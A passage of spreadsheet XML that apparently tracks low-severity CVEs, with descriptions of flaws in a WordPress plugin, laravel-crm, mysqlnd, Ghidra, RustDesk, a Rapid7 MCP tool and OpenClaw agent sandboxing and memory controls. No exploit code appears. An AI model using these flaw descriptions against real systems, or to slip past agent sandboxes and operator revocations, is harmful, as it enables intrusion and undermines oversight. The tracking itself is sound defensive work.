      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not sanitize a user-supplied destination folder before writing a generated image to disk, allowing users with the Contributor role and above to create directories and write or overwrite image files anywhere the web server can write, including outside the site's document root.
The written file name is always numeric with a fixed image extension, so executable code cannot be planted this way.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78394</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78397</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not validate the destination of a user-supplied URL before falling back to an unprotected fetch when its safe request is rejected, allowing unauthenticated visitors to make the site issue requests to hosts on its internal network and to learn from the response whether an internal service answered.
Versions below 7.8.8 are covered by CVE-2025-68600; this entry covers 7.8.8 through 7.9.5, where that fix was incomplete. Exploitation requires the site owner to have published the Link Library WordPress plugin before 7.9.6's public link submission form with reciprocal-link validation enabled.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78397</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97896</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr">
        <is>
          <t>f5, php, requests, hp</t>
        </is>
      </c>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in krayin laravel-crm up to 2.2.5. This vulnerability affects the function ConfigurationForm::rules of the file packages/Webkul/Admin/src/Http/Requests/ConfigurationForm.php of the component Upload Functionality. The manipulation leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.6 is able to resolve this issue. The identifier of the patch is b9836530ec9f5ef0f51653bb0cbbc47ef7184f51. It is advisable to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97896</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97897</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="inlineStr"/>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Krayin laravel-crm up to 2.2.5. This issue affects some unknown processing of the file Sanitizer.php of the component TinyMCE Media Upload. The manipulation results in cross site scripting. The attack may be performed from remote. Upgrading to version 2.2.6 is capable of addressing this issue. The patch is identified as 734aa10ae6c2ffa4c96c8869a89aa66940e4d345. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97897</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-1218</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr"/>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>The mysqlnd wire protocol parser reads fields out of server packets before checking that the packet still holds enough bytes for them. A malicious or compromised MySQL server can send a truncated packet and make the client read past the end of the packet buffer, which is undefined behaviour and can crash the process.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-1218</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100503</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>Ghidra versions through 12.1.4 contain a heap use-after-free vulnerability in the decompiler's Funcdata::opInsertAfter function caused by stale INDIRECT effect-op references. Attackers can craft a malicious binary with a specific x86-64 sequence that triggers the vulnerability during decompilation, causing the decompile helper process to crash and denying service to analysts and automated analysis pipelines.</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100503</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100573</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a sandbox policy bypass vulnerability in the MCP loopback component that allows sandboxed coding-agent sessions to invoke tools explicitly denied by sandbox.tools.deny policy. Attackers can list and invoke denied tools to access data or perform actions the operator intended to exclude from the sandbox.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100573</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100417</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>RustDesk before 1.5.0 on Windows fails to enforce the one-way file transfer option against peer clipboard file requests, allowing authenticated peers to read files from the host clipboard. Attackers can send FormatDataRequest and FileContentsRequest messages to retrieve copied files by guessing the FileGroupDescriptorW format identifier.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100417</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100534</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability in webhook TaskFlow cancellation that allows attackers to cancel unrelated sessions. An attacker with a webhook route secret can supply an arbitrary child session key to cancel ACP or subagent work outside the route's configured authority.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100534</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100537</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 fails to apply the originating requester's effective tool policy during Active Memory automatic recall. In deployments that use Active Memory together with requester-specific tool rules, deterministic and hidden recall paths can retrieve durable memory and inject it into the agent's context even when toolsBySender explicitly denies that requester access to the memory tools (memory_search, memory_get). As a result, an admitted but denied sender can receive information derived from durable memory in the agent's response without directly invoking any memory tool. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100537</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100542</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="inlineStr"/>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.5.28 and &lt; 2026.8.1 mishandle archive listings in the tar.bz2 skill installer: bounded command-output suffixes were treated as complete listings of the archive. A crafted .tar.bz2/.tbz2 skill archive can push prohibited entries out of both retained listings so that entry-count and size checks pass, and the archive is then extracted in full. If an operator approves installation of such a malicious or compromised skill archive, over-limit files or entry counts are persisted in the skill tools directory, consuming disk space or inodes. The issue bypasses OpenClaw's extraction budgets but does not by itself execute archive contents. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100542</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97866</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-300</t>
        </is>
      </c>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Zhonglun CloudPOS 3.0. Affected by this vulnerability is an unknown functionality of the file Program.cs of the component Automatic Update. Executing a manipulation of the argument version/url/packagekey/package name can lead to channel accessible by non-endpoint. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitation appears to be difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97866</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97228</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>Rapid7 Bulk Export MCP versions 0.2.5 through 0.6.1 suffer from a GraphQL query injection issue in the export-status component (`get_export_status` in `src/export_manager.py`), whereby the `export_id` value — an unvalidated MCP tool argument reaching the function via the `check_rapid7_export_status` and `download_rapid7_export` tools — is interpolated directly into the GraphQL query string. A crafted `export_id` containing quote and brace characters can terminate the intended `export(id: "...")` selection early and append attacker-controlled root-level selections (for example, schema introspection), producing a single well-formed GraphQL document that is then sent to the Rapid7 export API under the operator's own API key.
Notably, this issue does not grant an existing actor any access they do not already have: every injected query executes within the operator's own already-authenticated API scope, using the operator's own valid API key, and cannot cross a tenant or account boundary. A directly-malicious operator gains nothing they could not already do by calling the API directly; the realistic exposure is limited to a compromised or careless upstream MCP client, or indirect prompt injection forwarding an unvalidated identifier. This is fixed in version 0.6.2, which passes `export_id` as a parameterized GraphQL variable (`$exportId: ID!`).</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97228</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97721</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Sanluan PublicCMS up to 6.202506.e. This vulnerability affects the function CmsContentAdminController of the file publiccms-parent/publiccms-core/src/main/java/com/publiccms/controller/admin/sys/SysUserAdminController.java of the component exportExcel/exportData. This manipulation of the argument userId/deptId causes authorization bypass. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97721</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100539</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>2.6</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 fails to revoke memory tool access when an operator hot-disables memory configuration. Existing memory_search and memory_get tool instances retain the enabled configuration captured at creation time because the execution-time resolver treats explicit disablement like an unavailable configuration snapshot and restores the stale authority. As a result, during an already-running agent turn the model can continue searching and reading durable memory after the operator revoked that access, for the remainder of that run. Exploitation requires memory to be disabled while a previously created memory tool remains active. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100539</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75553</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
